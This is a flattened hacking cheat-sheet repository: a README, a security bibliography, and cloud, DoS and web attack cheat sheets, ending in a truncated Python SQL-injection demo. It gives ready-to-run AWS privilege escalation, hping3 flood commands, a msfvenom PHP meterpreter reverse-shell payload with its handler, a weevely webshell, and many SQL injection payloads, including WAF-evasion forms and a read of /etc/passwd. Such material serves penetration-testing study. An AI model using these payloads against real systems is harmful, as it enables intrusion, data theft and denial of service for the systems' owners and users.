├── .all-contributorsrc
├── .gitignore
├── README.md
├── bibliography-tutorials-conferences.md
├── cloud-hacking-cheat-sheets.md
├── dos-cheat-sheet.md
├── hacking-web-cheat-sheet.md
├── hacking-wireless-cheat-sheet.md
├── iot-hacking-cheat-sheets.md
├── nmap-cheat-sheet.md
├── os-distribution-virual-machines.md
├── other-links.md
├── package.json
├── session-hijacking-cheat-sheet.md
├── spoofing-network-cheat-sheet.md
├── steganography-cheat-sheet.md
├── system-hacking-cheat-sheet.md
└── tools.md

/.all-contributorsrc:
--------------------------------------------------------------------------------
{
  "projectName": "hacking-cheat-sheet",
  "projectOwner": "Lifka",
  "repoType": "github",
  "repoHost": "https://github.com/",
  "files": [
    "README.md"
  ],
  "imageSize": 100,
  "commit": true,
  "commitConvention": "none",
  "contributors": [],
  "contributorsPerLine": 7
}
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Logs
logs
*.log
npm-debug.log*
yarn-debug.log*
yarn-error.log*
lerna-debug.log*

# Diagnostic reports (https://nodejs.org/api/report.html)
report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json

# Runtime data
pids
*.pid
*.seed
*.pid.lock

# Directory for instrumented libs generated by jscoverage/JSCover
lib-cov

# Coverage directory used by tools like istanbul
coverage
*.lcov

# nyc test coverage
.nyc_output

# Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files)
.grunt

# Bower dependency directory (https://bower.io/)
bower_components

# node-waf configuration
.lock-wscript

# Compiled binary addons (https://nodejs.org/api/addons.html)
build/Release

# Dependency directories
node_modules/
jspm_packages/

# Snowpack dependency directory (https://snowpack.dev/)
web_modules/

# TypeScript cache
*.tsbuildinfo

# Optional npm cache directory
.npm

# Optional eslint cache
.eslintcache

# Microbundle cache
.rpt2_cache/
.rts2_cache_cjs/
.rts2_cache_es/
.rts2_cache_umd/

# Optional REPL history
.node_repl_history

# Output of 'npm pack'
*.tgz

# Yarn Integrity file
.yarn-integrity

# dotenv environment variables file
.env
.env.test

# parcel-bundler cache (https://parceljs.org/)
.cache
.parcel-cache

# Next.js build output
.next
out

# Nuxt.js build / generate output
.nuxt
dist

# Gatsby files
.cache/
# Comment in the public line in if your project uses Gatsby and not Next.js
# https://nextjs.org/blog/next-9-1#public-directory-support
# public

# vuepress build output
.vuepress/dist

# Serverless directories
.serverless/

# FuseBox cache
.fusebox/

# DynamoDB Local files
.dynamodb/

# TernJS port file
.tern-port

# Stores VSCode versions used for testing VSCode extensions
.vscode-test

# yarn v2
.yarn/cache
.yarn/unplugged
.yarn/build-state.yml
.yarn/install-state.gz
.pnp.*
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Hacking resources and cheat sheets

[![All Contributors](https://img.shields.io/badge/all_contributors-0-orange.svg?style=flat-square)](#contributors-)

A list of hacking utilities and resources that I consider useful and have collected, and continue to collect, during my studies.

## Index

* [Tools](tools.md)
* [OS distributions / Virtual machines](os-distribution-virual-machines.md)
* [Bibliography / Tutorials / Conferences](bibliography-tutorials-conferences.md)
* [Other links](other-links.md)
* Cheat sheets
  * [Cloud hacking cheat sheet](cloud-hacking-cheat-sheets.md)
  * [DoS cheat sheet](dos-cheat-sheet.md)
  * [Hacking web cheat sheet](hacking-web-cheat-sheet.md)
  * [Hacking wireless cheat sheet](hacking-wireless-cheat-sheet.md)
  * [Internet of Things (IoT) hacking cheat sheet](iot-hacking-cheat-sheets.md)
  * [NMap command cheat sheet](nmap-cheat-sheet.md)
  * [Session hijacking cheat sheet](session-hijacking-cheat-sheet.md)
  * [Spoofing networks cheat sheet](spoofing-network-cheat-sheet.md)
  * [Steganography cheat sheet](steganography-cheat-sheet.md)
  * [System hacking cheat sheet](system-hacking-cheat-sheet.md)
* [Contributors](#contributors)
* [License](#license)

## Contributors

This repository follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind are welcome!

## License

© 2023 [javierizquierdovera.com](https://javierizquierdovera.com)

Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option.

`SPDX-License-Identifier: (Apache-2.0 OR MIT)`
--------------------------------------------------------------------------------
/bibliography-tutorials-conferences.md:
--------------------------------------------------------------------------------
## Bibliography / Tutorials / Conferences

### Bug bounty

#### Articles
* [tbhm](https://github.com/jhaddix/tbhm): The Bug Hunter's Methodology.

#### Books
* [Real-world Bug Hunting: A Field Guide to Web Hacking](https://amzn.to/3r0FQY4)

#### Conferences
* [DEF CON Safe Mode Red Team Village - Jason Haddix - The Bug Hunters Methodology](https://www.youtube.com/watch?v=qPlpN4BVnRY)
* [Bugbounty en Español, todo lo que debes saber](https://www.youtube.com/watch?v=vLD34cGyHS8) (Spanish)

---

### Certifications

#### CEH (Certified Ethical Hacker)
* [CEHv9 - Practice exam questions with answers](https://yeahhub.com/cehv9-practice-exam-questions/chapter0-assessment.php)
* [CEHv10 official course](https://github.com/khanhnnvn/CEHv10)
* [Ethical Hacking Labs](https://github.com/Samsar4/Ethical-Hacking-Labs): A collection of tutorials and labs for ethical hacking students, cybersecurity students, and network and system administrators. The tutorials accompany the CEH v10 course material.
* [Notes for CEH v10 exam (source code)](https://github.com/g0rbe/CEH)
* [Exam simulator](https://ceh.cagy.org/)

##### Books
* [CEH Certified Ethical Hacker All-in-One Exam Guide](https://amzn.to/3cVbSAb)
* [CEH v10 Certified Ethical Hacker Study Guide](https://amzn.to/39PD8xT)

#### Miscellaneous
* [skillset](https://www.skillset.com/): Practice questions for different certifications.

---

### Forensics

#### Books
* [Digital Forensics Workbook: Hands-on Activities in Digital Forensics](https://amzn.to/3r1PNo6)

---

### Hacking web

#### Books
* [The Web Application Hacker's Handbook: Finding and Exploiting](https://amzn.to/3sB2ExI)

---

### Hacking wireless

#### Papers
* [Analysing WPA3's Dragonfly Handshake](https://wpa3.mathyvanhoef.com/)

---

### Internet of Things (IoT)

#### Articles
* [Internet of Things (IoT) Top 10](https://wiki.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Top_10)

---

### Malware / Reverse Engineering

#### Articles
* [Anatomy of a .NET Assembly – PE Headers](https://www.red-gate.com/simple-talk/blogs/anatomy-of-a-net-assembly-pe-headers/)
* [An In-Depth Look into the Win32 Portable Executable File Format](https://docs.microsoft.com/en-us/archive/msdn-magazine/2002/february/inside-windows-win32-portable-executable-file-format-in-detail)
* [An In-Depth Look into the Win32 Portable Executable File Format - Part 1](https://www.delphibasics.info/home/delphibasicsarticles/anin-depthlookintothewin32portableexecutablefileformat-part1)
* [An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities](https://resources.infosecinstitute.com/topic/intro-to-fuzzing/)
* [Antivirus-Artifacts](https://github.com/D3VI5H4/Antivirus-Artifacts): Anti-virus artifacts, listing the APIs hooked by Avira, BitDefender, F-Secure, MalwareBytes, Norton, TrendMicro, and WebRoot.
* [APTnotes](https://github.com/kbandla/APTnotes): Various public documents, whitepapers and articles about APT campaigns.
* [Axial - Community Papers](https://ax1al.com/community_papers.html): Papers about malware and reverse engineering.
* [Basics of Windows shellcode writing](https://idafchev.github.io/exploit/2017/09/26/writing_windows_shellcode.html)
* ['CRYPTERS': PRACTICANDO LA TÉCNICA DSPLIT/AVFUCKER](http://www.securitybydefault.com/2013/09/crypters-practicando-la-tecnica.html) (Spanish)
* [corkami: Abusing File Formats, CharSets, Initial registers values under Windows, ...](https://github.com/corkami/docs)
* [Introducing the TypeRefHash (TRH) (.NET)](https://www.gdatasoftware.com/blog/2020/06/36164-introducing-the-typerefhash-trh)
* [Machine Learning for Malware Detection by Kaspersky](https://media.kaspersky.com/en/enterprise-security/Kaspersky-Lab-Whitepaper-Machine-Learning.pdf)
* [MalwareAnalysis.co Publications](https://malwareanalysis.co/publications/)
* [Malware-analysis-and-Reverse-engineering](https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering): Some of the author's publicly available malware analysis and reverse engineering write-ups.
* [Macro Malware Again](https://www.cyberfox.blog/macro-malware-again/)
* [Malware researcher's handbook (demystifying PE file)](https://resources.infosecinstitute.com/topic/2-malware-researchers-handbook-demystifying-pe-file/)
* [PeStudio Standard](https://medium.com/@aubsec/pestudio-standard-f2ada4e8564)
* [Reverse Engineering Malicious Macros for Fun & Profit](https://jhalon.github.io/re-malicious-macros/)
* [Reverse engineering tools for .NET applications](https://pelock.medium.com/reverse-engineering-tools-for-net-applications-a28275f185b4)
* [richprint](https://github.com/dishather/richprint#readme): Prints the compiler information stored in the Rich Header of PE executables.
127 | * [The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory (Wile05)](https://amzn.to/3q76D3O) 128 | * [The IDA Pro Book: The Unofficial Guide to the World's Most Popular](https://amzn.to/3uAg0MB) 129 | 130 | #### Cheat sheets and posters 131 | * [MalwareAnalysis.co Cheat Sheets](https://malwareanalysis.co/cheat-sheets/) 132 | * [PE Format Poster](http://www.openrce.org/reference_library/files/reference/PE%20Format.pdf) 133 | * [PE Format Poster](https://github.com/corkami/pics/blob/master/binary/pe101/pe101.pdf) 134 | * [Intel 80x86 Assembler Code Table](http://www.jegerlehner.ch/intel/IntelCodeTable_es.pdf) (Spanish) 135 | 136 | #### Documentation 137 | * [PE Format](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format) 138 | * [Windows Vista Kernel Structures](https://www.nirsoft.net/kernel_struct/vista/index.html) 139 | 140 | #### Magazines 141 | * [CodeBreakers Magazine](http://index-of.es/Windows/pe/CBM_1_2_2006_Goppit_PE_Format_Reverse_Engineer_View.pdf) 142 | 143 | #### Papers 144 | * [Leveraging the PE Rich Header for Static Malware Detection and Linking](https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/paper/39045) 145 | * [PE Header Analysis for Malware Detection](https://scholarworks.sjsu.edu/etd_projects/624/) 146 | 147 | #### Tutorials 148 | * [Assembly Programming Tutorial](https://www.tutorialspoint.com/assembly_programming/index.htm) 149 | * [Debugging TLS Callbacks](https://resources.infosecinstitute.com/topic/debugging-tls-callbacks/) 150 | * [Code Survival: Debug a Compiled DLL](https://rift.stacktitan.com/code-survival-debug-compiled-dll/) 151 | * [malware_training_vol1](https://github.com/hasherezade/malware_training_vol1): Materials for Windows Malware Analysis training (volume 1) 152 | * [Malware Analysis - Wannacry](https://www.purpl3f0xsecur1ty.tech/2021/02/17/wannacry.html) 153 | * [pestudio references](https://www.winitor.com/references/) 154 | * [Reverse 
Engineering Analysis Lab STRRAT](https://www.jaiminton.com/reverse-engineering/strrat#) 155 | * [Reverse Engineering tutorials by Ricardo Narvaja](http://ricardonarvaja.info/) (Spanish) 156 | * [The malware analyst’s guide to aPLib decompression](https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/) 157 | 158 | #### Videotutorials 159 | * [Analyzing Ransomware - Beginner Static Analysis](https://www.youtube.com/watch?v=9nuo-AGg4p4) 160 | * [Análisis Dinámico de Malware Parte 1 (Spanish)](https://www.youtube.com/watch?v=AWUGPxSCQ4I) 161 | * [Ange Albertini: Funky File Formats](https://www.youtube.com/watch?v=hdCs6bPM4is) 162 | * [Building a Malware Lab - Software, Hardware, Tools and Tips for Effective Malware Analysis](https://www.youtube.com/watch?v=bBvOiADXjEQ) 163 | * [CppCon 2017: James McNellis "Todo lo que siempre quisiste saber sobre las DLL"](https://www.youtube.com/watch?v=JPQWQfDhICA) 164 | * [CursoReversing](https://www.youtube.com/channel/UCPNPSP20z4FGfgMJ71VOJjw/playlists) (Spanish): YouTube channel about reverse engineering. 165 | * [CursoReversing desde cero (Ricardo Narvaja 2020)](https://www.youtube.com/watch?v=Af5pvCl0CBE) (Spanish) 166 | * [How does PDF malware work? 
| Malicious PDF’s Explained – What is a malicious pdf?](https://www.youtube.com/watch?v=U8xExM3ykYA) 167 | * [JNLP Dangers - Java Malware Detection & Analysis](https://www.youtube.com/watch?v=9b-I2t-uwx0) 168 | * [Malware Analysis Bootcamp - Analyzing The PE Header](https://www.youtube.com/watch?v=z0e306Jod5A) 169 | * [Process Injection](https://www.youtube.com/playlist?list=PLXm1FM6zsxpBt7vZiS9Q4-4nvybd9il3t) (Spanish) 170 | * [Reverse Engineering desde 0](https://www.youtube.com/watch?v=-9xChS3ZgvU&list=PL6RJR1V-uAbzSW9EF_5AMmt_0P7vhGa3N) (Spanish) 171 | 172 | 173 | 174 | --- 175 | 176 | 177 | 178 | ### Miscellaneous 179 | 180 | #### Articles 181 | * [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) 182 | * [index-of.es](http://index-of.es/) 183 | * [PDF Tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) 184 | * [What Actually is Threat Hunting?](https://blogs.gartner.com/pete-shoard/whats-threat-hunting/) 185 | 186 | #### Cheat sheets 187 | * [Google dorks](https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06) 188 | 189 | #### Conferences 190 | * [Cybersecurity Conferences](https://infosec-conferences.com/): Listing All Virtual Cybersecurity Conferences And Virtual Hacking Events (Worldwide). 

---

### Networks

#### Articles
* [Descubre Hping3 para manipular paquetes TCP/IP y hacer ataques](https://www.redeszone.net/tutoriales/seguridad/hping3-manipular-paquetes-tcp-ip-ataques/) (Spanish)

#### Cheat sheets
* [Wireshark cheat sheet](https://cdn.comparitech.com/wp-content/uploads/2019/06/Wireshark-Cheat-Sheet.pdf)

---

### Programming

#### Books
* [Clean Code](https://amzn.to/3ktAVMI)
* [Design Patterns: Elements of Reusable Object-Oriented Software](https://amzn.to/2O4TLOj)
* [Head First Design Patterns (A Brain Friendly Guide)](https://amzn.to/3uGdgNE)
* [Introduction to Algorithms](https://amzn.to/2ZU8myH)
* [JavaScript - The Definitive Guide: Master the World's Most-Used](https://amzn.to/3sC2dn9)
* [Mythical Man-Month, The: Essays on Software Engineering](https://amzn.to/3aYrRfG)
* [Patterns of Enterprise Application Architecture](https://amzn.to/3pU69Oc)
* [Pragmatic Programmer, The: From Journeyman to Master](https://amzn.to/3q2jfsC)
* [Refactoring: Improving the Design of Existing Code](https://amzn.to/3sC2I0v)
* [Refactoring JavaScript: Turning Bad Code Into Good Code](https://amzn.to/3pWdMnb)
* [The Linux Programming Interface: A Linux and UNIX System](https://amzn.to/3krYZjb)
* [Threat Modeling: Designing for Security](https://amzn.to/2ZZpnr4)
* [Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers](https://amzn.to/3r0GV24)

---

### Protection

#### Articles
* [Awesome-CobaltStrike-Defence](https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence): Defences against Cobalt Strike.

---

### Salesforce

#### Articles
* [10 Tips to Passing Security Review from Trailhead](https://partners.salesforce.com/partnerNews?id=a033A00000FtLm6QAF)

#### Conferences
* [Become a Salesforce security Superman! with Alba Azcona Rivas](https://www.youtube.com/watch?v=MSAurvPVPeA)
* [Lightning Web Components - Episode 4 : Security and Testing](https://www.youtube.com/watch?v=R7j8dDzsPho)

#### Documentation
* [AppExchange Security Review](https://developer.salesforce.com/docs/atlas.en-us.packagingGuide.meta/packagingGuide/security_review_overview.htm)
* [Checkmarx: Setting Up the Visual Studio Code Extension Plugin](https://checkmarx.atlassian.net/wiki/spaces/SD/pages/1759216424/Setting+Up+the+Visual+Studio+Code+Extension+Plugin)
* [Salesforce Security Basics](https://developer.salesforce.com/docs/atlas.en-us.securityImplGuide.meta/securityImplGuide/overview_security.htm)
* [Salesforce Security Guide](https://developer.salesforce.com/docs/atlas.en-us.securityImplGuide.meta/securityImplGuide/salesforce_security_guide.htm)

#### Trailheads
* [AppExchange Security Review](https://trailhead.salesforce.com/content/learn/modules/isv_security_review)
* [Protect Your Salesforce Data](https://trailhead.salesforce.com/content/learn/trails/security)

---

### Social engineering

#### Articles
* [4 new and devious phishing techniques with example phishing emails](https://fractionalciso.com/4-new-and-devious-phishing-techniques-with-example-phishing-emails/)

#### Books
* [Ingeniería social. El arte del hacking personal](https://amzn.to/3aYSxNp) (Spanish)
* [Social Engineering: The Science of Human Hacking](https://amzn.to/2NBFJDX)

#### Conferences
* [Ingeniería Social, el verdadero poder seguridad informática phishing ciberseguridad](https://www.youtube.com/watch?v=qyJsBjvw2dc&t=1707s) (Spanish)

---

### System hacking

#### Articles
* [CTFs. Otra perspectiva del hacking.](https://derechodelared.com/ctfs-hacking/) (Spanish)
* [Identifying Named Pipe Impersonation and Other Malicious Privilege Escalation Techniques](https://securityintelligence.com/identifying-named-pipe-impersonation-and-other-malicious-privilege-escalation-techniques/)
* [Learning Linux Kernel Exploitation - Part 1](https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/)

#### Cheat sheets
* [Beacon](https://github.com/HarmJ0y/CheatSheets/blob/master/Beacon.pdf)
* [Burp Suite](https://derechodelared.com/burp-suite-cheat-sheet/)
* [Empire](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf)
* [PowerSploit](https://github.com/HarmJ0y/CheatSheets/blob/master/PowerSploit.pdf)
* [PowerUp](https://github.com/HarmJ0y/CheatSheets/blob/master/PowerUp.pdf)
* [PowerView](https://github.com/HarmJ0y/CheatSheets/blob/master/PowerView.pdf)

#### Tutorials
* [PowerUp: A Usage Guide](https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/)

#### Books
* [Rtfm: Red Team Field Manual](https://amzn.to/3pW8et7)

--------------------------------------------------------------------------------
/cloud-hacking-cheat-sheets.md:
--------------------------------------------------------------------------------
## Cloud hacking cheat sheet

### Amazon

#### Install awscli
```sh
pip3 install awscli
```

#### S3 Bucket Enumeration

##### Search for public buckets from a company using lazys3
```sh
ruby lazys3.rb [COMPANY]
```

##### Search for public buckets from a company using s3scanner
```sh
python3 ./s3scanner.py sites.txt
```

##### Dump all open buckets and log both open and closed buckets using s3scanner
```sh
python3 ./s3scanner.py --include-closed --out-file found.txt --dump names.txt
```

##### Save the file listings of all open buckets to a file using s3scanner
```sh
python ./s3scanner.py --list names.txt
```

#### Escalate IAM User Privileges by Exploiting Misconfigured User Policy
```sh
vim user-policy.json
```

Insert:
```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}
```

Create the policy and attach it (user-policy) to the target IAM user's account:

```sh
aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json

aws iam attach-user-policy --user-name [Target Username] --policy-arn arn:aws:iam::[Account ID]:policy/user-policy
```

#### View user policies
```sh
aws iam list-attached-user-policies --user-name [Target Username]
```

#### List users
```sh
aws iam list-users
```

#### List buckets
```sh
aws s3api list-buckets --query "Buckets[].Name"
```

#### List user policies
```sh
aws iam list-user-policies --user-name [Target Username]
```

#### List role policies
```sh
aws iam list-role-policies --role-name [Role Name]
```

#### List group policies
```sh
aws iam list-group-policies --group-name [Group Name]
```

#### Create user
```sh
aws iam create-user --user-name [Username]
```

--------------------------------------------------------------------------------
/dos-cheat-sheet.md:
--------------------------------------------------------------------------------
## DoS cheat sheet

### SYN Flooding
SYN flooding abuses the way most hosts implement the TCP three-way handshake. The attacker sends SYN packets faster than the target can process them. Each SYN normally makes the host allocate state for a half-open connection and hold it in the listen backlog while it waits for the client's ACK; a flood of SYNs exhausts that backlog, so legitimate connection attempts are dropped.

#### Using Metasploit

```sh
msfconsole
use auxiliary/dos/tcp/synflood
```

### PoD attack
The attacker tries to crash, freeze, or destabilize the targeted system or service by sending malformed or oversized packets using a simple ping command.

#### Using hping3

```sh
hping3 -d 65538 -S -p 21 --flood [Target IP]
```

-d: Specifies the data size.

-S: Sets the SYN flag.

-p: Specifies the destination port.

--flood: Sends a huge number of packets.

### Spoof source IP

#### Using hping3

```sh
hping3 -S [Target IP] -a [IP Spoofed]
```

-S: Sets the SYN flag.

-a: Spoofs the source IP address.

### UDP application layer flood attack

#### Using hping3

```sh
hping3 -2 -p 139 --flood [Target IP]
```

-2: Selects UDP mode.

-p: Specifies the destination port.

--flood: Sends a huge number of packets.

--------------------------------------------------------------------------------
/hacking-web-cheat-sheet.md:
--------------------------------------------------------------------------------
## Hacking web cheat sheet

### Gathering web server

#### Finding default content of web server using nikto

```sh
nikto -h [HOST] -Tuning x
```

#### Analyze website using skipfish

```sh
skipfish -o /root/output -S /usr/share/skipfish/dictionaries/complete.wl [HOST:8080]
```

#### Discover web directories using uniscan

```sh
uniscan -u [HOST] -q
```

#### Discover robots.txt and sitemap.xml files using uniscan
```sh
uniscan -u [HOST] -we
```

#### Perform dynamic tests using uniscan
Obtains information about emails, source code disclosures, and external hosts.

```sh
uniscan -u [HOST] -d
```

#### Perform a port and service discovery scan using nmap

```sh
nmap -T4 -A -v [HOST]
```

#### Perform web application reconnaissance using WhatWeb
WhatWeb recognizes web technologies such as blogging platforms, email addresses, content management systems (CMS), account IDs, statistics and analytics packages, JavaScript libraries, and embedded devices. It also identifies version numbers, web servers, web framework modules, etc.

```sh
whatweb [HOST]
```

```sh
whatweb -v [HOST]
```

#### Detect Load Balancers

```sh
dig [HOST]
```
```sh
lbd [HOST]
```

#### Enumerate server using nmap (applications, directories, and files)

```sh
nmap -sV --script http-enum [HOST]
```

#### Fast-paced enumeration of the hidden files and directories of the target web application using Gobuster

```sh
gobuster dir -u [HOST] -w [DICTIONARY]
```

### Attack website

#### Enumerate vulnerable WordPress plugins using wpscan

```sh
wpscan --api-token [API Token] --url [HOST] --plugins-detection aggressive --enumerate vp
```

--enumerate vp: Enumerates vulnerable plugins.

#### Create meterpreter php payload and encode using msfvenom

```sh
msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine] LPORT=4444 -f raw
```

Upload the file to the web server and open it, with the handler listening:

```sh
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST [IP Address of Host Machine]
set LPORT 4444
run
```

#### Webshell using weevely

```sh
weevely generate [PASSWORD] [FILE PATH]
```

Upload the shell to the web server...
104 | 105 | ```sh 106 | weevely http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php [PASSWORD] 107 | ``` 108 | 109 | ### SQL Injection 110 | 111 | #### Try to bypass website login forms 112 | 113 | ```sh 114 | admin' -- 115 | ``` 116 | 117 | ```sh 118 | admin' # 119 | ``` 120 | 121 | ```sh 122 | admin'/* 123 | ``` 124 | 125 | ```sh 126 | ' or 1=1-- 127 | ``` 128 | 129 | ```sh 130 | ' or 1=1# 131 | ``` 132 | 133 | ```sh 134 | ' or 1=1/* 135 | ``` 136 | 137 | ```sh 138 | ') or '1'='1-- 139 | ``` 140 | 141 | ```sh 142 | ') or ('1'='1-- 143 | ``` 144 | 145 | ```sh 146 | ' UNION SELECT 1,'anotheruser','any password', 1-- 147 | ``` 148 | 149 | #### Union 150 | 151 | ##### Extract data 152 | 153 | ```sh 154 | blah' UNION SELECT 0, username, password, 0 from users -- 155 | ``` 156 | 157 | ##### Extract database name 158 | 159 | ```sh 160 | 1 UNION SELECT ALL 1,DB_NAME,3,4-- 161 | ``` 162 | 163 | ##### Extract database tables 164 | 165 | ```sh 166 | 1 UNION SELECT ALL 1,TABLE_NAME,3,4 from sysobjects where xtype=char(85)-- 167 | ``` 168 | 169 | ##### Extract table column names 170 | 171 | ```sh 172 | 1 UNION SELECT ALL 1,column_name,3,4 form DB_NAME.information_schema.columns where table_name='EMPLOYEE_TABLE'-- 173 | ``` 174 | 175 | ##### Extract first field data 176 | 177 | ```sh 178 | 1 UNION SELECT ALL 1COLUMN-NAME-1,3,4 from EMPLOYEE_NAME -- 179 | ``` 180 | 181 | #### Perform error based SQL Injection 182 | 183 | ##### Extract database name 184 | 185 | ```sh 186 | 1 or 1=convert(int,(DB_NAME))-- 187 | ``` 188 | 189 | ##### Extract first database table 190 | 191 | ```sh 192 | 1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85))) 193 | ``` 194 | 195 | ##### Extract first table column name 196 | 197 | ```sh 198 | 1 or 1=convert(int, (select top 1 column_name from DBNAME.information_scherma.columns where table_name='TABLE-NAME-1'))-- 199 | ``` 200 | 201 | ##### Extract first field of first row 202 | 203 | ```sh 204 | 1 or 1=convert(int, (select 
top 1 COLUMN-NAME-1 from TABLE-NAME-1))-- 205 | ``` 206 | 207 | #### Extract database user (time-based blind, MSSQL) 208 | Nothing is echoed back; the query is made to pause only when a guess is right, so the answer is read from the response time. 209 | ##### Check for username length 210 | 211 | ```sh 212 | 1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- 213 | 1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'-- 214 | 1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- 215 | ... 216 | ``` 217 | 218 | ##### Check if the first character of the username is 'a' (ASCII 97), 'b' (98), 'c' (99), and so on 219 | 220 | ```sh 221 | 1; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:05'-- 222 | 1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:05'-- 223 | 1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:05'-- 224 | ... 225 | ``` 226 | 227 | ##### Check if the second character of the username is 'a' (97), 'b' (98), 'c' (99), and so on 228 | 229 | ```sh 230 | 1; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:05'-- 231 | 1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:05'-- 232 | 1; IF (ASCII(lower(substring((USER),2,1)))=99) WAITFOR DELAY '00:00:05'-- 233 | ... 234 | ``` 235 | 236 | ##### Check if the third character of the username is 'a' (97), 'b' (98), 'c' (99), and so on 237 | 238 | ```sh 239 | 1; IF (ASCII(lower(substring((USER),3,1)))=97) WAITFOR DELAY '00:00:05'-- 240 | 1; IF (ASCII(lower(substring((USER),3,1)))=98) WAITFOR DELAY '00:00:05'-- 241 | 1; IF (ASCII(lower(substring((USER),3,1)))=99) WAITFOR DELAY '00:00:05'-- 242 | ...
243 | ``` 244 | 245 | #### Bypass a web application firewall (WAF) 246 | 247 | ##### Normalization method 248 | Inline comments replace white space and break up the token sequence a signature expects; the database strips them before parsing, so the first form executes unchanged. Whether a keyword can itself be split, as in the second form, depends on the engine. 249 | ```sh 250 | 1/*union*/union/*select*/select+1,2,3/* 251 | ``` 252 | ```sh 253 | '/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/**/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'admin'-- 254 | ``` 255 | 256 | ###### Evading the ' OR 1=1 signature 257 | Any expression that is always true does the same job as 1=1: 258 | ```sh 259 | 'OR 'john'='john' 260 | ``` 261 | ```sh 262 | 'OR 8 > 4 263 | ``` 264 | ```sh 265 | 'OR 5 BETWEEN 4 AND 6 266 | ``` 267 | ```sh 268 | 'OR 'apple'='app'+'le' 269 | ``` 270 | ```sh 271 | 'OR 'software' LIKE 'soft%' 272 | ``` 273 | ```sh 274 | 'OR 'asd'>'a' 275 | ``` 276 | ```sh 277 | 'OR 'movies'=N'movies' 278 | ``` 279 | ```sh 280 | 'OR 'blabla' IN ('blabla') 281 | ``` 282 | 283 | ##### Character encoding 284 | Building strings with char() keeps quotes and recognizable words out of the request. 285 | ###### Load files in unions (string="/etc/passwd") 286 | 287 | ```sh 288 | ' union select 1,(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; 289 | ``` 290 | 291 | ###### Inject without quotes (string = "%") 292 | ```sh 293 | ' or username like char(37) 294 | ``` 295 | 296 | ###### Inject without quotes (string = "root") 297 | ```sh 298 | ' union select * from users where login = char(114,111,111,116); 299 | ``` 300 | 301 | ###### Check for existing files (string = "n.ext") 302 | ```sh 303 | ' and 1=(if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); 304 | ``` 305 | 306 | 307 | ##### HPP technique 308 | HTTP Parameter Pollution: send the same parameter several times. Back ends that join duplicate values (ASP.NET joins them with a comma) reassemble the payload from the pieces, while each piece on its own looks harmless to the WAF. 309 | 310 | ```sh 311 | 1;select+1&id=2,3+from+users+where+id=1-- 312 | ``` 313 | 314 | ##### HPF technique 315 | HTTP Parameter Fragmentation: the payload is split across parameters and the /*&b=*/ pieces become comments once the back end has joined the values. 316 | ```sh 317 | 1+union/*&b=*/select+1,2 318 | 1+union/*&b=*/select+1,pass/*&c=*/from+users-- 319 | ``` 320 | 321 | ##### Blind SQL Injection 322 | Replace the keywords a WAF signature looks for with equivalent SQL functions and operators (a hex literal instead of a quoted string, mid() instead of substring()), so the comparison still works while the signature no longer matches.
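The blind techniques in this section, the character-by-character WAITFOR DELAY probes above and the REGEXP/LIKE range checks further down, all reduce to asking the database one yes/no question per request. The script below is an added example, not code from the original cheat sheet or from any real application: it drives that loop against a throwaway SQLite database built inline. It shows the `admin' --` login bypass against a concatenated query, the same input against the bound-parameter version, and a boolean-based blind extraction that bisects each character's code point instead of testing candidates one at a time. The table and column names, the two user rows and the `profile_exists` oracle are constructed for the demo; SQLite's `unicode()`, `substr()` and `length()` stand in for ASCII(), SUBSTRING() and LEN().

```python
"""Blind SQL injection loop against a throwaway SQLite target.

Added example for this cheat sheet; not code from the original page or from
any real application. Table/column names, the two rows, and the
profile_exists() oracle are constructed for the demo.
"""
import sqlite3

# Constructed target: an in-memory database standing in for the web app's.
_DB = sqlite3.connect(":memory:")
_DB.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'S3cret!Pa55'), (2, 'dave', 'toor');
""")


def login_vulnerable(username, password):
    """Query built by string concatenation: the login-bypass surface."""
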